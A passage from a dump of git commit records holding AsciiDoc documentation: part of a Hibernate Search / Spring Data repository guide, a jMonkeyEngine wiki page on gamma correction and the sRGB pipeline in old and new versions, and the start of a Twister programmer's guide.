instance of `me.snowdrop.data.hibernatesearch.orm.JpaDatasourceMapper`.\nIts constructor expects an `EntityManagerFactory`.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.config.infinispan.InfinispanDatasourceMapper`.\nIts constructor expects a `me.snowdrop.data.hibernatesearch.config.infinispan.EntityToCacheMapper`.\n\n[[hibernatesearch.repository]]\n= Repository interfaces\n\n[[hibernatesearch.repository.extending]]\n== JPA repository extension\n\nThis section explains how to add Hibernate Search methods to a JPA repository.\nThis means that, whenever Spring Data implements these methods automatically\n(see <<hibernatesearch.query-methods.derived,derived queries>>, <<hibernatesearch.query-methods.at-query,declared queries>>),\nthey are implemented as Hibernate Search queries (i.e. 
methods targeting a full-text index)\ninstead of JPA queries.\n\n[NOTE]\n====\nThis feature is only available if you set up\nthe Hibernate Search \/ Spring Data integration to extend JPA repositories:\nsee <<hibernatesearch.jpaextension>>.\n====\n\nIn order to add a Hibernate Search extension to a JPA repository, you need to:\n\n* create an interface extending `me.snowdrop.data.hibernatesearch.repository.extension.RepositoryHibernateSearchExtension<T, ID>`\n* add to this interface the methods that are to be implemented as Hibernate Search queries\n* make the interface of your JPA repository extend this interface\n\n.Extending a JPA repository with Hibernate Search query methods\n====\n[source,java]\n----\npublic interface BookRepositoryHibernateSearchExtension extends RepositoryHibernateSearchExtension<Book, String>\n{\n List<Book> findByName(String name);\n}\n\npublic interface BookRepository extends JpaRepository<Book, String>, BookRepositoryHibernateSearchExtension\n{\n List<Book> findByPrice(Integer price);\n}\n\npublic class SomeComponent {\n\n @Autowired\n BookRepository bookRepository;\n\n public void doSomething() {\n \/\/ This executes a Hibernate Search query, i.e. a query on the full-text indexes, instead of a JPA query\n List<Book> books = bookRepository.findByName(\"robots dawn\");\n\n \/\/ ... do something with the book list ...\n }\n\n}\n----\n====\n\n[[hibernatesearch.repository.standalone]]\n== Standalone Hibernate Search repository\n\nTo declare repository interfaces, you can extend either the generic `org.springframework.data.repository.Repository<T, ID>` interface\n(if there is no ambiguity as to which Spring Data module should implement the repository)\nor the more specific `me.snowdrop.data.hibernatesearch.repository.HibernateSearchRepository<T, ID>`.\n\n[[hibernatesearch.query-methods]]\n= Query methods\n\n[[hibernatesearch.query-methods.finders]]\n== Query lookup strategies\n\nQueries can be <<hibernatesearch.query-methods.derived,derived from the method name>>,\nor be <<hibernatesearch.query-methods.at-query,defined as strings and assigned to a method>>.\n\nAs with any Spring Data module, you can also implement query methods yourself through\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/current\/reference\/html\/#repositories.custom-implementations[custom implementation fragments].\n\n[[hibernatesearch.query-methods.derived]]\n== Derived queries\n\nGenerally the query derivation mechanism for Hibernate Search works as described in\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/{springDataVersion}\/reference\/html\/#repositories.query-methods[the Spring Data Commons documentation].\n\nHere's a short example of what a Hibernate Search query method translates into:\n\n.Query creation from method names\n====\n[source,java]\n----\npublic interface BookRepository extends Repository<Book, String>\n{\n List<Book> findByNameAndPrice(String name, Integer price);\n} \n----\n====\n\nThe method name above will be translated into the following call to a Hibernate Search query builder:\n\n[source,java]\n----\nQuery query = queryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\nA list of supported keywords for Hibernate Search is shown below.\n\n[cols=\"1,2,3\", options=\"header\"]\n.Supported keywords inside method names\n|===\n| Keyword\n| Sample\n| Query builder equivalent\n\n| `Is`\n| 
`findByName`\n| `queryBuilder.keyword().onField(\"name\").matching(name).createQuery()`\n\n| `And`\n| `findByNameAndPrice`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Or`\n| `findByNameOrPrice`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Not`\n| `findByNameNot`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Between`\n| `findByPriceBetween`\n| `queryBuilder.range().onField(\"price\").from(lower).to(upper).createQuery()`\n\n| `LessThan`\n| `findByPriceLessThan`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `LessThanEqual`\n| `findByPriceLessThanEqual`\n| `queryBuilder.range().onField(\"price\").below(upper).createQuery()`\n\n| `GreaterThan`\n| `findByPriceGreaterThan`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `GreaterThanEqual`\n| `findByPriceGreaterThanEqual`\n| `queryBuilder.range().onField(\"price\").above(lower).createQuery()`\n\n| `Before`\n| `findByPriceBefore`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `After`\n| `findByPriceAfter`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `Like`\n| `findByNameLike`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `StartingWith`\n| `findByNameStartingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `EndingWith`\n| `findByNameEndingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name)`\n\n| `Contains\/Containing`\n| `findByNameContaining`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name + \"*\")`\n\n| `In`\n| `findByNameIn(Collection<String>names)`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n \/\/ ...\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .createQuery();\n----\n\n| `NotIn`\n| `findByNameNotIn(Collection<String>names)`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .not()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n .not()\n \/\/ ...\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Near`\n| `findByStoreNear`\n| `Not Supported Yet !`\n\n| `True`\n| `findByAvailableTrue`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)`\n\n| `False`\n| `findByAvailableFalse`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(false)`\n\n| `MatchesRegex`\/`Regex`\/`Matches`\n| `findByNameMatchesRegex`\n| `new RegexpQuery(new Term(\"name\", reqexp)`\n\n| `Within`\n| `findByLocationWithin`\n| 
`queryBuilder.spatial().onField(\"location\").within(distance, Unit.KM).ofLatitude(latitude).andLongitude(longitude).createQuery()`\n\n| `OrderBy`\n| `findByAvailableTrueOrderByNameDesc`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)` and\n`queryBuilder.sort().byField(\"name\").desc().createSort()`\n|===\n\n[[hibernatesearch.query-methods.fieldnames]]\n=== Targeting specific fields\n\nBy default, derived queries target the default field,\nthe one named after the entity property mentioned in the query method name.\nThat is to say, if your method refers to the property \"name\", the query will target the index field \"name\",\nand will expect that index field to exist.\n\nWhat if you want to target the field \"name_sort\"?\nYou can use the `@me.snowdrop.data.hibernatesearch.annotations.TargetField` annotation.\n\n.Target non-default fields using the `@TargetField` annotation.\n====\n[source,java]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @TargetField(property = \"name\", field = \"name_sort\")\n Page<Book> findByAvailableTrueOrderByNameAsc(String name, Pageable pageable);\n}\n----\n====\n\n[[hibernatesearch.query-methods.at-query]]\n== Using @Query Annotation\n\nQueries can be defined as strings using the `me.snowdrop.data.hibernatesearch.annotations.Query` annotation.\nSuch strings are expected to use the Lucene Query syntax.\n\nThey can be named and defined in a resource file,\nthe location of which is defined when <<hibernatesearch.jpaextension.configuration,configuring>> the Hibernate Search module.\nThen the queries will be assigned to a query method using `@Query(name = \"<the query name>\")`.\n\nAlternatively, the queries can be assigned to the method directly using `@Query(\"<the query>\")`.\n\n.Declare query at the method using the `@Query` annotation.\n====\n[source,java]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @Query(\"+name:?0\")\n Page<Book> findByName(String name, Pageable pageable);\n} \n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7045744fb8202002db4f98a607289cf4bb48e369","subject":"remove links","message":"remove links\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/jme3_srgbpipeline.adoc","new_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/jme3_srgbpipeline.adoc","new_contents":"= Gamma Correction or sRGB pipeline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Overview\n\nWe consider color values to be linear when computing lighting. What does that mean? It means that we assume that the color 0.5,0.5,0.5 is half way between black and white. +\nThe problem is that it\u2019s not the case, or at least not when you look at the color through a monitor. +\nCRT monitors had physical limitations that prevented them from having a linear way of representing colors. That means that 0.5,0.5,0.5 through a monitor is not half way between black and white (it\u2019s darker). Note that black and white remain the same, though. +\nIf we do not take that into account, the rendered images are overly darkened and feel dull. +\nLCD monitors still mimic this physical limitation (I guess for backward compatibility).
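\n\nAs a concrete illustration of the two directions (plain Java, with gamma approximated as 2.2 as discussed below; the variable names are illustrative):\n\n[source,java]\n----\nfloat gamma = 2.2f;\n\n\/\/ Output correction: linear intensity -> value the monitor will display correctly.\nfloat corrected = (float) Math.pow(linearValue, 1.0 \/ gamma);\n\n\/\/ Input linearization: gamma-corrected (sRGB) texture value -> linear value for lighting math.\nfloat linear = (float) Math.pow(storedValue, gamma);\n----\n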
\n*Output correct colors* +\nGamma Correction is the technique that tends to correct the issue. Gamma is a power factor applied to the color by the monitor when lighting a pixel on screen (or at least a simplification of the function applied). So when we output the color, we have to apply the inverse power of this factor to nullify the effect: finalColor = pow(computedColor, 1\/gamma); +\n\n*Knowing what colors we have as input* +\nThe other aspect of gamma correction is the colors we get as input in the rendering process, stored in textures or in ColorRGBA material params. Almost all image editors store color data in images already gamma corrected (so that colors are correct when you display the picture in a viewer or in a browser). Also, most hand-picked colors (in a color picker) can be assumed to be gamma corrected, as you most probably chose this color through a monitor display.\nSuch images or colors are said to be in sRGB color space, meaning \u201cstandard RGB\u201d (which is not the standard one would guess).\nThat means that textures and colors that we use as input in our shaders are not in a linear space. The issue is that we need them in linear space when we compute the lighting, else the lighting is wrong.\nTo avoid this we need to apply some gamma correction to the colors: pow(color, gamma).\nThis only applies to textures that will render colors on screen (basically diffuse maps, specular maps, light maps). Normal maps and height maps don\u2019t need the correction.\n\nThis is the kind of difference you can have: +\nleft is the non-corrected output, right is the gamma corrected output. +\nimage:http:\/\/i.imgur.com\/uNL7vw8.png[uNL7vw8.png,width=\"\",height=\"\"]\n\n\n\n=== Implementation\n\n* To handle proper gamma corrected output colors, OpenGL exposes an ARB extension that allows you to output a color in linear space and have the GPU automatically correct it: link:https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt[https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt]\n* To handle the input, instead of the classic RGBA8 image format, one can use SRGB8_ALPHA8_EXT, which is basically RGBA in sRGB. Using this you tell the GPU that the texture is in sRGB space, and when fetching a color from it, the GPU will linearize the color value for you (for free). There are sRGB equivalents to all 8-bit formats (even compressed formats like DXT).\n* But not all textures need this. For example, normal map and height map colors are most probably generated, and not hand picked by an artist looking through a monitor. The implementation needs to account for this and expose a way to exclude some textures from the sRGB pipeline.\n\nGamma Correction in jME 3.0 is based on those three statements.\n\n[IMPORTANT]\n====\nNote that Gamma Correction is only available on desktop with the LWJGL or JOGL renderer. It is not yet supported on the Android or iOS renderers.\n====\n\n\n\n==== Turning Gamma Correction on\/off\n\nYou can turn Gamma Correction on and off using the AppSettings. There is a method setGammaCorrection(boolean) that changes the setting.\nUse this in the main() method of your application:\n\n[source,java]\n----\n\nAppSettings settings = new AppSettings(true);\nsettings.setGammaCorrection(true);\napp.setSettings(settings);\n\n----\n\nThis setting is also exposed in the Settings dialog displayed when you launch a jME application. +\nimage:http:\/\/i.imgur.com\/Lya1ldH.png[Lya1ldH.png,width=\"400\",height=\"\"]\n\n\n[IMPORTANT]\n====\nThis is a shorthand to enable both linearization of input textures and Gamma correction of the rendered output on screen. +\n*Both can be enabled separately*.\n\n====\n
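\nAs a sketch, enabling the two halves individually (rather than through AppSettings) could look like this, assuming you hold a `renderer` reference, for example during application initialization:\n\n[source,java]\n----\n\/\/ Output side: gamma correct the colors rendered to the main framebuffer.\nrenderer.setMainFrameBufferSrgb(true);\n\n\/\/ Input side: linearize sRGB-marked images when their texels are fetched.\nrenderer.setLinearizeSrgbImages(true);\n----\n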
\n\n===== Enabling output Gamma Correction\n\nYou can enable or disable the Gamma correction of the rendered output by using:\n\n[source,java]\n----\nrenderer.setMainFrameBufferSrgb(boolean srgb)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB extension.\nThis can be toggled at run time.\n\nThis uses OpenGL hardware gamma correction, which assumes an approximated gamma value of 2.2 and applies the following formula: color = pow(color, 1\/gamma)\n\n[NOTE]\n====\nThis will not yield exact results, as the real gamma can vary depending on the monitor. +\nIf this is a problem, please refer to the \u201cHandling rendered output Gamma Correction with a post process filter\u201d section.\n====\n\n\n===== Enabling texture linearization\n\nYou can enable or disable texture linearization by using\n\n[source,java]\n----\nrenderer.setLinearizeSrgbImages(boolean linearize)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB extension.\n\n[IMPORTANT]\n====\nToggling this setting at runtime will produce unexpected behavior for now. A change in this setting would need a proper reload of the context to work.\n====\n\n\nAll images marked as being in sRGB color space will be uploaded to the GPU using an sRGB image format.\nOpenGL hardware texture linearization also uses an approximated gamma value of 2.2 and linearizes the fetched texel color using the following formula: color = pow(color, gamma) +\nAs with output gamma correction this will not give exact results, but the error is less important since most image editors use the same approximation to correct images and save them in sRGB color space.\n\nNot all image formats have an sRGB equivalent; only 8-bit formats do.\nHere is an exhaustive list of the supported formats and their equivalents:\n\n* RGB8 : GL_SRGB8\n* RGBA8 : GL_SRGB8_ALPHA8\n* BGR8 : GL_SRGB8\n* ABGR8 : GL_SRGB8_ALPHA8\n* Luminance8 : GL_SLUMINANCE8\n* Luminance8Alpha8 : GL_SLUMINANCE8_ALPHA8\n* DXT1 : GL_COMPRESSED_SRGB_S3TC_DXT1\n* DXT1A : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1\n* DXT3 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3\n* DXT5 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5\n\n\n[IMPORTANT]\n====\nConventionally, only the RGB channels are gamma corrected, as the alpha channel does not represent a color value.\n====\n\n\n\n==== Excluding images from the sRGB pipeline\n\n\n[IMPORTANT]\n====\nOnly loaded images will be marked as being in sRGB color space when using assetManager.loadTexture or loadAsset. +\nThe color space of an image created by code will have to be specified in the constructor, or will be assumed to be Linear if not specified.\n====\n\n\nNot all images need to be linearized. Some images don't represent color information that will be displayed on screen, but rather a different sort of data packed into a texture. +\nThe best example is a normal map, which contains normal vectors for each pixel. Height maps will contain elevation values. These textures must not be linearized.\n\nThere is no way to determine the real color space of an image when loading it, so we must deduce the color space from the usage it's loaded for. The usage is dictated by the material those textures are used for, and by the material parameter they are assigned to.\nOne can now specify in a material definition file (j3md) whether a texture parameter must be assumed to be in linear color space, and thus must not be linearized, by using the keyword -LINEAR next to the parameter (case does not matter).\n\nFor example, here is how the NormalMap parameter is declared in the lighting material definition.\n\n[source]\n----\n\n \/\/ Normal map\n Texture2D NormalMap -LINEAR\n\n----\n\nWhen a texture is assigned to this material param by using material.setTexture(\"NormalMap\", myNormalTexture), the color space of this texture's image will be forced to linear. So if you make your own material and want to use Gamma Correction, make sure you properly mark your textures as being in the proper color space.\n\nThis can sound complicated, but you just have to answer this question: does my image represent color data? If the answer is no, then you have to set the -LINEAR flag.\n\n\n==== ColorRGBA as sRGB\n\n\n[IMPORTANT]\n====\nThe r, g, b attributes of a ColorRGBA object are *ALWAYS* assumed to be in Linear color space.\n\n====\n\n\nIf you want to set a color that you hand picked in a color picker, you should use the setAsSRGB method of ColorRGBA. This will convert the given values to linear color space by using the same formula as before: color = pow(color, gamma), where gamma = 2.2.\n\nIf you want to retrieve those values from a ColorRGBA, you can call the getAsSRGB method. The values will be converted back to sRGB color space.\n\n[NOTE]\n====\nThe return type of that method is a Vector4f and not a ColorRGBA, because, as stated before, all ColorRGBA objects' r, g, b attributes are assumed to be in Linear color space.\n====\n\n\n==== Handling rendered output Gamma Correction with a post process filter\n\nAs stated before, the hardware gamma correction uses an approximated gamma value of 2.2.\nSome may not be satisfied with that approximation and may want to pick a more appropriate gamma value.\nSome games include Gamma calibration screens that help the player pick a correct gamma value for the monitor they're using.\n\nFor this particular case, you can do as follows (see the sketch after this list):\n\n. Enable the Gamma Correction global app setting.\n. Disable rendered output correction: renderer.setMainFrameBufferSrgb(false); (for example in the simpleInitApp method of your SimpleApplication).\n. Use the GammaCorrectionFilter in a FilterPostProcessor, and set the proper gamma value on it (default is 2.2).\n
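\nA minimal sketch of those three steps might look like this (gamma correction is assumed to have been enabled in AppSettings as shown earlier; the gamma value of 2.0 is just an example a calibration screen might produce):\n\n[source,java]\n----\n\/\/ Step 2: bypass the hardware output correction.\nrenderer.setMainFrameBufferSrgb(false);\n\n\/\/ Step 3: correct the output in a post process filter with a custom gamma value.\nFilterPostProcessor fpp = new FilterPostProcessor(assetManager);\nGammaCorrectionFilter gammaFilter = new GammaCorrectionFilter();\ngammaFilter.setGamma(2.0f); \/\/ example value, ideally calibrated per monitor\nfpp.addFilter(gammaFilter);\nviewPort.addProcessor(fpp);\n----\n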
\n\n=== Should you use this?\n\nYes. Mostly because it's the only way to have proper lighting.\nIf you're starting a new project, it's a no-brainer\u2026 use it, period. And don't allow the player to turn it off.\n\nNow, if you already spent time adjusting the lighting in your scenes without gamma correction, turning it on will make everything too bright, and you'll have to adjust all your lighting and colors again.\nThat's why we kept a way to turn it off, for backward compatibility.\n","old_contents":"= Gamma Correction or sRGB pipeline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Overview\n\nHere is a quick overview of what lies under the \u201cGamma Correction term. 
+\nMore in depth rundowns on the matter can be found here : link:http:\/\/http.developer.nvidia.com\/GPUGems3\/gpugems3_ch24.html[http:\/\/http.developer.nvidia.com\/GPUGems3\/gpugems3_ch24.html] and here link:http:\/\/www.arcsynthesis.org\/gltut\/Texturing\/Tutorial%2016.html[http:\/\/www.arcsynthesis.org\/gltut\/Texturing\/Tutorial%2016.html]\n\nWe consider color values to be linear when computing lighting. What does that means? That means that we assume that the color 0.5,0.5,0.5 is half way between black and white. +\nThe problem is that it\u2019s not the case, or at least not when you look at the color through a monitor. +\nCRT monitors had physical limitations that prevented them to have a linear way of representing colors. that means that 0.5,0.5,0.5 through a monitor is not half way between black and white (it\u2019s darker). Note that black and white remains the same though. +\nIf we do not take that into account, the rendered images are overly darken and feels dull. +\nLCD monitors still mimic this physical limitation (I guess for backward compatibility). +\n*Output correct colors* +\nGamma Correction is the technique that tends to correct the issue. Gamma is an power factor applied to the color by the monitor when lighting a pixel on screen (or at least a simplification of the function applied). So when we output the color, we have to apply the inverse power of this factor to nullify the effect : finalColor = pow(computedColor, 1\/gamma); +\n\n*Knowing what colors we have as input* +\nThe other aspect of gamma correction is the colors we get as input in the rendering process that are stored in textures or in ColorRGBA material params. Almost all image editors are storing color data in images already gamma corrected (so that colors are correct when you display the picture in a viewer of in a browser). Also most hand picked colors (in a color picker) can be assumed as gamma corrected as you most probably chose this color through a monitor display.\nSuch images or color are said to be in sRGB color space, meaning \u201cstandard RGB\u201d (which is not the standard one would guess).\nThat means that textures and colors that we use as input in our shaders are not in a linear space. The issue is that we need them in linear space when we compute the lighting, else the lighting is wrong.\nTo avoid this we need to apply some gamma correction to the colors : (pow(color, gamma);\nThis only apply to textures that will render colors on screen (basically diffuse map, specular, light maps). Normal maps, height maps don\u2019t need the correction.\n\nThis is the kind of difference you can have : +\nleft is non corrected output, right is gamma corrected output. +\nimage:http:\/\/i.imgur.com\/uNL7vw8.png[uNL7vw8.png,width=\"\",height=\"\"]\n\n\n\n=== Implementation\n\n* To handle proper gamma corrected ouput colors, Opengl expose an ARB extension that allows you to output a color in linear space and have the GPU automatically correct it : link:https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt[https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt]\n* To handle the input, instead of classic RGBA8 image format, one can use SRGB8_ALPHA8_EXT which is basically RGBA in sRGB. Using this you specify the GPU that the texture is in sRGB space and when fetching a color from it, the GPU will linearize the color value for you (for free). There are sRGB equivalent to all 8 bits formats (even compressed format like DXT).\n* But all textures don't need this. 
For example, normal maps, height maps colors are most probably generated and not hand picked by an artist looking through a monitor. The implementation needs to account for it and expose a way to exclude some textures from the sRGB pipeline.\n\nGamma Correction in jME 3.0 is based on those three statements.\n\n[IMPORTANT]\n====\nNote that Gamma Correction is only available on desktop with LWJGL or JOGL renderer. They are not yet supported on Android or iOS renderers.\n====\n\n\n\n==== Turning Gamma Correction on\/off\n\nYou can turn Gamma Correction on and off using the AppSettings. There is a method setGammaCorrection(boolean) that changes the setting.\nuse this in the main() method of your application :\n\n[source,java]\n----\n\nAppSettings settings = new AppSettings(true);\nsettings.setGammaCorrection(true);\napp.setSettings(settings);\n\n----\n\nThis setting is also exposed in the Settings dialog displayed when you launch a jME application. +\nimage:http:\/\/i.imgur.com\/Lya1ldH.png[Lya1ldH.png,width=\"400\",height=\"\"]\n\n\n[IMPORTANT]\n====\nThis is a short hand to enable both linearization of input textures and Gamma correction of the rendered output on screen. +\n*Both can be enabled separately*.\n\n====\n\n\n\n===== Enabling output Gamma Correction\n\nYou can enable or disable the Gamma correction of the rendered output by using:\n\n[source,java]\n----\nrenderer.setMainFrameBufferSrgb(boolean srgb)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB.\nThis can be toggled at run time.\n\nThis uses Opengl hardware gamma correction that uses an approximated Gamma value of 2.2 and uses the following formula : color = pow(color,1\/gamma) \n\n[NOTE]\n====\nThis will not yield exact results, as the real gamma can vary depending on the monitor. +\nIf this is a problem, please refer to the \u201chandling gamma correction in a post process section.\n====\n\n\n===== Enabling texture linearization\n\nYou can enable or disable texture linearization by using\n\n[source,java]\n----\nrenderer.setLinearizeSrgbImages(boolean linearize)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB.\n\n[IMPORTANT]\n====\nToggling this setting at runtime will produce unexpected behavior for now. 
A change in this setting would need a proper reload of the context to work.\n====\n\n\nAll images marked as in sRGB color space will be uploaded to the GPU using a sRGB image format.\nOpengl hardware texture linearization also uses an approximated Gamma value of 2.2 and linearize the fetched texel color using the following formula : color = pow(color, gamma) +\nAs with output gamma correction this will not give exact result, but the error is less important since most image editor uses the same approximation to correct images and save them in sRGB color space.\n\nNot all image format have their sRGB equivalent, and only 8bit formats.\nHere is an exhaustive list of the supported format and there equivalent :\n\n* RGB8 : GL_SRGB8\n* RGBA8 : GL_SRGB8_ALPHA8\n* BGR8 : GL_SRGB8\n* ABGR8 : GL_SRGB8_ALPHA8\n* Luminance8 : GL_SLUMINANCE8\n* Luminance8Alpha8 : GL_SLUMINANCE8_ALPHA8\n* DXT1 : GL_COMPRESSED_SRGB_S3TC_DXT1\n* DXT1A : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1\n* DXT3 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3\n* DXT5 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5\n\n\n[IMPORTANT]\n====\nConventionally only the rgb channels are gamma corrected, as the alpha channel does not a represent a color value\n====\n\n\n\n==== Excluding images from the sRGB pipeline\n\n\n[IMPORTANT]\n====\nOnly loaded images will be marked as in sRGB color space, when using assetManager.loadTexture or loadAsset. +\nThe color space of an image created by code will have to be specified in the constructor or will be assumed as Linear if not specified.\n====\n\n\nNot all images need to be linearized. Some images don't represent color information that will be displayed on screen, but more different sort of data packed in a texture. +\nThe best example is a Normal map that will contains normal vectors for each pixel. Height maps will contain elevation values. These textures must not be linearized.\n\nThere is no way to determine the real color space of an image when loading it, so we must deduce the color space from the usage it's loaded for. The usage is dictated by the material, those textures are used for, and by the material parameter they are assigned to.\nOne can now specify in a material definition file (j3md) if a texture parameter must be assumed as in linear color space, and thus, must not be linearized, by using the keyword -LINEAR next to the parameter (case does not matter).\n\nFor example here is how the NormalMap parameter is declared in the lighting material definition.\n\n[source]\n----\n\n \/\/ Normal map\n Texture2D NormalMap -LINEAR\n\n----\n\nWhen a texture is assigned to this material param by using material.setTexture(\u201cNormalMap, myNormalTexture), the color space of this texture's image will be forced to linear. So if you make your own material and want to use Gamma Correction, make sure you properly mark your textures as in the proper color space.\n\nThis can sound complicated, but you just have to answer this question : Does my image represent color data? if the answer is no, then you have to set the -Linear flag.\n\n\n==== ColorRGBA as sRGB\n\n\n[IMPORTANT]\n====\nThe r, g, b attributes of a ColorRGBA object are *ALWAYS* assumed in Linear color space.\n\n====\n\n\nIf you want to set a color that you hand picked in a color picker, you should use the setAsSRGB method of ColorRGBA. This will convert the given values to linear color space by using the same formula as before : color = pow (color, gamma) where gamma = 2.2;\n\nIf you want to retrieve those values from a ColorRGBA, you can call the getAsSRGB method. 
The values will be converted back to sRGB color Space.\n\n[NOTE]\n====\nThe return type of that method is a Vector4f and not a ColorRGBA, because as stated before, all ColorRGBA objects r,g,b attributes are assumed in Linear color space.\n====\n\n\n==== Handling rendered output Gamma Correction with a post process filter\n\nAs stated before, the hardware gamma correction uses and approximated gamma value of 2.2.\nSome may not be satisfied with that approximations and may want to pick a more appropriate gamma value.\nYou can see in some games some Gamma calibration screens, that are here to help the player pick a correct gamma value for the monitor he's using.\n\nFor this particular case, you can do as follow :\n\n. Enable Gamma Correction global app setting.\n. Disable rendered output correction : renderer.setMainFrameBufferSrgb(false); (for example in the simpleInit method of your SimpleApplication).\n. Use the GammaCorrectionFilter in a FilterPostProcessor, and set the proper gamma value on it (default is 2.2).\n\n\n=== Should you use this?\n\nYes. Mostly because it's the only way to have proper lighting.\nIf you're starting a new project it's a no brainer\u2026use it, period. And don't allow the player to turn it off.\n\nNow if you already spent time to adjust lighting in your scenes, without gamma correction, turning it on will make everything too bright, and you'll have to adjust all your lighting and colors again.\nThat's why we kept a way to turn it off, for backward compatibility.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"2bada7423cb9da398c6bab23fdfa915be56ff72d","subject":"Added document in the repo","message":"Added document in the repo\n","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_contents":"= TWISTER APPLICATION PROGRAMMERS GUIDE\r\n:docinfo:\r\n[preface]\r\n== Introduction\r\nThis document gives an overview of the modules build in Twister API and how an application is built on it. The detailed definitions and individual function calls can be found in the doc folder of Twister API. \r\nAt start, the document explains the core modules of twister API, these include initialization module, event loop, ARP table management and JSON parsing. Details of build system are also included.\r\nAfter that, it explains the sample application step by step to give programmer an example of API usage. The Appendices contain information to debug any relevant issues. \r\nThe best way to start is to go through the Sample Applications Details Section initially while reviewing the code of the sample application and then go through the whole document for complete understanding of design of Twister API and application development on top of it. \r\n\r\n\r\n\r\n== Initialization Module\r\nThe initialization module of API handles the initialization of twister abstraction layer. Abstraction layer consists of the following parts:\r\n* System Memory Reservation: The abstraction layer facilitates the reservation of different memory zones, for example, physical memory areas for device interactions.\r\n* Allocate PCI resources and set up the physical device and the link\r\n* Initialize statistics counters\r\n* Link Up\/Down control and notification interrupt. 
